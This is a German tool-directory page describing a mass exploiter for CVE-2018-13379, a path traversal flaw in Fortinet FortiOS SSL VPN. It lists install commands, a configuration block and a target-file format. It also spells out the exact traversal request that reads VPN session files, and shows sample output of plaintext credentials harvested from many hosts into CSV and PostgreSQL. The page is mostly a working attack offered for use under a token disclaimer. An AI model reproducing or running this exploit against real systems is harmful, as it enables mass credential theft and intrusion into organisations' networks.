Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Multi-threaded-mass-exploiter-CVE-2018-13379-POC — CVE-2018-13379 Massenexploit für Fortinet FortiOS SSL VPN. Extrahiert sofort Anmeldedaten, speichert in CSV + PostgreSQL. Mehrthread-fähig, keine unnötigen Warnungen. | Kitploit
Tools/GitHubGitHub/instructor-admin/multi-threaded-mass-exploiter-cve-2018-13379-poc
PasswortangriffeSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsRed Teaming
GitHubinstructor-admin/multi-threaded-mass-exploiter-cve-2018-13379-poc

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Multi-threaded-mass-exploiter-CVE-2018-13379-POC

CVE-2018-13379 Massenexploit für Fortinet FortiOS SSL VPN. Extrahiert sofort Anmeldedaten, speichert in CSV + PostgreSQL. Mehrthread-fähig, keine unnötigen Warnungen.

Repository anzeigen
1vor 2 MonatenNoch nicht geprüft

preview

CVE-2018-13379 — Massen-Exploit für Fortinet FortiOS SSL VPN

Ein Werkzeug zur Massenausnutzung der Schwachstelle CVE-2018-13379 (Path Traversal) in Fortinet FortiOS SSL VPN. Ermöglicht das Lesen von Sitzungsdateien und das Extrahieren von Logins und Passwörtern im Klartext.

Funktionen

  • Ausnutzung von CVE-2018-13379 über den Endpunkt /remote/fgt_lang
  • Multithreading (standardmäßig 20 Threads)
  • Sofortiges Speichern gefundener Anmeldedaten in CSV und PostgreSQL
  • Dynamische Tabellennamen in PostgreSQL mit einem Zeitstempel (fortios_creds_20250120_143052)
  • Keine Warnungen – nur die Ergebnisse

Installation

root@kitploit:~
git clone https://github.com/Instructor-Admin/Multi-threaded-mass-exploiter-CVE-2018-13379-POC.git
cd Multi-threaded-mass-exploiter-CVE-2018-13379-POC
pip3 install requests psycopg2-binary

Konfiguration

Alle Einstellungen sind direkt im Skript editierbar – kein Herumfummeln mit Kommandozeilenargumenten:

root@kitploit:~
TARGETS_FILE = "targets.txt" # File with targets (ip:port)
CSV_FILE = "fortios_creds.csv" # Output CSV file

PostgreSQL (optional – das Skript funktioniert auch ohne Datenbank)

root@kitploit:~
PG_HOST = "127.0.0.1"
PG_PORT = 5432
PG_DB = "fortios_db"
PG_USER = "postgres"
PG_PASSWORD = "password"
THREADS = 20
TIMEOUT = 8

Verwendung

  1. Erstellen Sie eine Datei targets.txt mit Zielen, eine pro Zeile:
root@kitploit:~
192.168.1.1:8443
10.0.0.5:10443
172.16.0.1:443
  1. Führen Sie das Skript aus:
root@kitploit:~
python3 exploit.py

Ergebnisse

  • CSV-Datei — alle gefundenen Anmeldedaten mit Zeitstempeln
  • PostgreSQL-Tabelle — bei jedem Durchlauf wird eine neue Tabelle erstellt (fortios_creds_YYYYMMDD_HHMMSS)

Beispielausgabe:

root@kitploit:~
[+] 100 targets loaded. We're running in 20 threads...
[+] LEAKED: 192.168.1.1:8443
→ Pulled 3 credentials
Wrote 3 credentials to CSV
3 credentials entered into the DB
[-] Not leaky: 10.0.0.1:10443

Funktionsweise

  1. Eine GET-Anfrage wird an die Adresse https://ip:port/remote/fgt_lang?lang=/../../../..///////////dev/cmdb/sslvpn_websession gesendet
  2. Die Antwort wird darauf überprüft, ob sie die Zeichenfolge var fgt_lang enthält (ein Zeichen der Schwachstelle)
  3. Die Paare von username und password werden aus der binären Antwort extrahiert
  4. Die gefundenen Daten werden sofort in CSV und PostgreSQL gespeichert
  5. Das Skript wechselt zum nächsten Ziel.

Anforderungen

  • Python 3.6+
  • requests
  • psycopg2-binary (optional – ohne es funktionieren nur CSV-Dateien)
  • urllib3

Warnung

Dieses Werkzeug ist für Bildungszwecke und autorisierte Tests vorgesehen. Sie sind für Ihre eigenen Handlungen verantwortlich.

Danksagungen

  • Ursprüngliche Schwachstelle entdeckt von Meh Chang
  • Die Ausnutzungslogik basiert auf öffentlich zugänglicher Forschung

Lizenz

Unlicense – machen Sie, was Sie wollen.

Tool herunterladen